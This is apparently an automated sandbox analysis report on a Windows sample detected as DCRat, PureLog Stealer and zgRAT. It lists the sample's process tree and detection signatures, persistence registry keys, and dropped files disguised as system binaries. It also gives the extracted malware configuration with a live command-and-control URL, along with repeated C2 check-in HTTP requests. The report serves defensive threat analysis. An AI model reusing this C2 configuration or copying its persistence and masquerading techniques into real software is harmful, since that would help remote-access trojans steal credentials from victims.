Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
jW5TA1J9Z1.exe

Overview

General Information

Sample name:jW5TA1J9Z1.exe
renamed because original name is a hash value
Original sample name:910284D590BDF27BBEEDBDE3F3A2A94D.exe
Analysis ID:1496460
MD5:910284d590bdf27bbeedbde3f3a2a94d
SHA1:6561ef1e4b2521aaf86f03ab791ac5ed6c4af7d0
SHA256:6a397c6e1041ad55295c3fe2cf7f795da853004c1a02e1d77c65f0da86ad312e
Tags:DCRatexe
Infos:

Detection

DCRat, PureLog Stealer, zgRAT
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected DCRat
Yara detected PureLog Stealer
Yara detected zgRAT
.NET source code contains method to dynamically call methods (often used by packers)
AI detected suspicious sample
Creates an autostart registry key pointing to binary in C:\Windows
Creates an undocumented autostart registry key
Creates multiple autostart registry keys
Drops PE files with benign system names
Drops executable to a common third party application directory
Drops executables to the windows directory (C:\Windows) and starts them
Infects executable files (exe, dll, sys, html)
Machine Learning detection for dropped file
Machine Learning detection for sample
Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Files With System Process Name In Unsuspected Locations
Sigma detected: System File Execution Location Anomaly
Tries to harvest and steal browser information (history, passwords, etc)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Compiles C# or VB.Net code
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Creates files inside the system directory
Deletes files inside the Windows folder
Detected potential crypto function
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the windows directory (C:\Windows)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: CurrentVersion NT Autorun Keys Modification
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Sigma detected: Use Short Name Path in Command Line
Uses 32bit PE files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • jW5TA1J9Z1.exe (PID: 3036 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
    • csc.exe (PID: 6208 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 6880 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 400 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • csc.exe (PID: 7300 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)
      • conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 7400 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESE4ED.tmp" "c:\Windows\System32\CSC6D3A6DCEBAC9465EA9FC90BCE51AABF4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)
    • cmd.exe (PID: 7520 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
      • conhost.exe (PID: 7532 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • chcp.com (PID: 7568 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)
      • w32tm.exe (PID: 7584 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)
      • jW5TA1J9Z1.exe (PID: 7840 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 7964 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 180 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 4904 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 7600 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 3824 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 1860 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 7916 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 7032 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • RuntimeBroker.exe (PID: 4580 cmdline: "C:\Windows\DiagTrack\RuntimeBroker.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • dwm.exe (PID: 2436 cmdline: "C:\Program Files (x86)\internet explorer\SIGNUP\dwm.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • MQYzEFytUKABjmoxvNTPTwUrcL.exe (PID: 5368 cmdline: "C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • jW5TA1J9Z1.exe (PID: 5664 cmdline: "C:\Users\user\Desktop\jW5TA1J9Z1.exe" MD5: 910284D590BDF27BBEEDBDE3F3A2A94D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DCRatDCRat is a typical RAT that has been around since at least June 2019.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat
NameDescriptionAttributionBlogpost URLsLink
zgRATzgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
jW5TA1J9Z1.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
    jW5TA1J9Z1.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

      Dropped Files

      SourceRuleDescriptionAuthorStrings
      C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
        C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
          C:\Windows\AppReadiness\RuntimeBroker.exeJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
            C:\Windows\AppReadiness\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
              C:\Windows\AppReadiness\RuntimeBroker.exeJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                Click to see the 5 entries

                Memory Dumps

                SourceRuleDescriptionAuthorStrings
                00000017.00000002.2519392668.0000000002C4B000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                  00000000.00000000.1237730669.0000000000632000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security
                    00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                      00000017.00000002.2519392668.0000000002F28000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                        00000017.00000002.2519392668.00000000028D2000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DCRat_1Yara detected DCRatJoe Security
                          Click to see the 3 entries

                          Unpacked PEs

                          SourceRuleDescriptionAuthorStrings
                          0.0.jW5TA1J9Z1.exe.630000.0.unpackJoeSecurity_zgRAT_1Yara detected zgRATJoe Security
                            0.0.jW5TA1J9Z1.exe.630000.0.unpackJoeSecurity_PureLogStealerYara detected PureLog StealerJoe Security

                              Sigma Signatures

                              System Summary

                              barindex
                              Sigma detected: Files With System Process Name In Unsuspected Locations
                              Source: File createdAuthor: Sander Wiebing, Tim Shelton, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetFilename: C:\Windows\DiagTrack\RuntimeBroker.exe
                              Sigma detected: System File Execution Location Anomaly
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), Patrick Bareiss, Anton Kutepov, oscd.community, Nasreddine Bencherchali: Data: Command: "C:\Windows\DiagTrack\RuntimeBroker.exe" , CommandLine: "C:\Windows\DiagTrack\RuntimeBroker.exe" , CommandLine|base64offset|contains: , Image: C:\Windows\DiagTrack\RuntimeBroker.exe, NewProcessName: C:\Windows\DiagTrack\RuntimeBroker.exe, OriginalFileName: C:\Windows\DiagTrack\RuntimeBroker.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\DiagTrack\RuntimeBroker.exe" , ProcessId: 7964, ProcessName: RuntimeBroker.exe
                              Sigma detected: CurrentVersion Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Windows\AppReadiness\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker
                              Sigma detected: CurrentVersion NT Autorun Keys Modification
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: explorer.exe, "C:\Windows\AppReadiness\RuntimeBroker.exe", EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
                              Sigma detected: Dynamic .NET Compilation Via Csc.EXE
                              Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\jW5TA1J9Z1.exe", ParentImage: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ParentProcessId: 3036, ParentProcessName: jW5TA1J9Z1.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ProcessId: 6208, ProcessName: csc.exe
                              Sigma detected: Use Short Name Path in Command Line
                              Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", CommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", CommandLine|base64offset|contains: 8c, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ParentImage: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentProcessId: 6208, ParentProcessName: csc.exe, ProcessCommandLine: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user~1\AppData\Local\Temp\RESDF50.tmp" "c:\Program Files (x86)\Microsoft\Edge\Application\CSC3376F6C86CE44268A97E49BC81EF4C9D.TMP", ProcessId: 400, ProcessName: cvtres.exe
                              Sigma detected: Dynamic CSharp Compile Artefact
                              Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ProcessId: 3036, TargetFilename: C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline

                              Data Obfuscation

                              barindex
                              Sigma detected: Dot net compiler compiles file from suspicious location
                              Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\jW5TA1J9Z1.exe", ParentImage: C:\Users\user\Desktop\jW5TA1J9Z1.exe, ParentProcessId: 3036, ParentProcessName: jW5TA1J9Z1.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.cmdline", ProcessId: 6208, ProcessName: csc.exe

                              Suricata Signatures

                              Timestamp:2024-08-21T10:03:04.099115+0200
                              SID:2048095
                              Severity:1
                              Source Port:49709
                              Destination Port:80
                              Protocol:TCP
                              Classtype:A Network Trojan was detected

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus / Scanner detection for submitted sample
                              Source: jW5TA1J9Z1.exeAvira: detected
                              Antivirus detection for dropped file
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Windows\AppReadiness\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\DVfmUYdt.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Windows\AppReadiness\RuntimeBroker.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\Desktop\oANPimHy.logAvira: detection malicious, Label: TR/PSW.Agent.qngqt
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeAvira: detection malicious, Label: HEUR/AGEN.1323342
                              Source: C:\Users\user\AppData\Local\Temp\VTnJCG0P6y.batAvira: detection malicious, Label: BAT/Delbat.C
                              Source: C:\Users\user\Desktop\umLWkwXM.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Source: C:\Users\user\Desktop\dMjZyaMQ.logAvira: detection malicious, Label: HEUR/AGEN.1300079
                              Found malware configuration
                              Source: 00000000.00000002.1296629058.0000000012F88000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: DCRat {"C2 url": "http://373292cm.nyashka.top/JavascriptSecureSqlLocalTemporary", "MUTEX": "DCR_MUTEX-NUz87R2ScA5J4vD9Ssui", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}
                              Multi AV Scanner detection for dropped file
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeReversingLabs: Detection: 73%
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeReversingLabs: Detection: 73%
                              Source: C:\Users\user\Desktop\DVfmUYdt.logReversingLabs: Detection: 70%
                              Source: C:\Users\user\Desktop\UiajPhxi.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\kDsGBTSe.logReversingLabs: Detection: 29%
                              Source: C:\Users\user\Desktop\oANPimHy.logReversingLabs: Detection: 70%
                              Source: C:\Windows\AppReadiness\RuntimeBroker.exeReversingLabs: Detection: 73%
                              Source: C:\Windows\DiagTrack\RuntimeBroker.exeReversingLabs: Detection: 73%
                              Source: C:\Windows\ServiceProfiles\MQYzEFytUKABjmoxvNTPTwUrcL.exeReversingLabs: Detection: 73%
                              Multi AV Scanner detection for submitted file
                              Source: jW5TA1J9Z1.exeReversingLabs: Detection: 73%
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for dropped file
                              Source: C:\Users\user\Desktop\bakRRaCx.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Internet Explorer\SIGNUP\dwm.exeJoe Sandbox ML: detected
                              Source: C:\Windows\AppReadiness\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\DVfmUYdt.logJoe Sandbox ML: detected
                              Source: C:\Windows\AppReadiness\RuntimeBroker.exeJoe Sandbox ML: detected
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\oANPimHy.logJoe Sandbox ML: detected
                              Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\LzHTfErB.logJoe Sandbox ML: detected
                              Source: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJoe Sandbox ML: detected
                              Machine Learning detection for sample
                              Source: jW5TA1J9Z1.exeJoe Sandbox ML: detected
                              Source: jW5TA1J9Z1.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDirectory created: C:\Program Files\7-Zip\Lang\MQYzEFytUKABjmoxvNTPTwUrcL.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeDirectory created: C:\Program Files\7-Zip\Lang\3b1a2dfabaeac3Jump to behavior
                              Source: jW5TA1J9Z1.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\2vh3op5q\2vh3op5q.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp
                              Source: Binary string: ;C:\Users\user\AppData\Local\Temp\0fn2jk23\0fn2jk23.pdb source: jW5TA1J9Z1.exe, 00000000.00000002.1293145015.0000000003547000.00000004.00000800.00020000.00000000.sdmp

                              Spreading

                              barindex
                              Infects executable files (exe, dll, sys, html)
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Windows\System32\SecurityHealthSystray.exeJump to behavior
                              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeSystem file written: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\userJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Documents\desktop.iniJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\AppDataJump to behavior
                              Source: C:\Users\user\Desktop\jW5TA1J9Z1.exeFile opened: C:\Users\user\Desktop\desktop.iniJump to behavior

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2048095 - Severity 1 - ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) : 192.168.2.7:49709 -> 80.211.144.156:80
                              Source: Joe Sandbox ViewASN Name: ARUBA-ASNIT ARUBA-ASNIT
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 344Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 384Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1868Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continue
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1852Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 1844Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2536Expect: 100-continueConnection: Keep-Alive
                              Source: global trafficHTTP traffic detected: POST /JavascriptSecureSqlLocalTemporary.php HTTP/1.1Content-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36Host: 373292cm.nyashka.topContent-Length: 2544Expect: 100-continueConnection: Keep-Alive
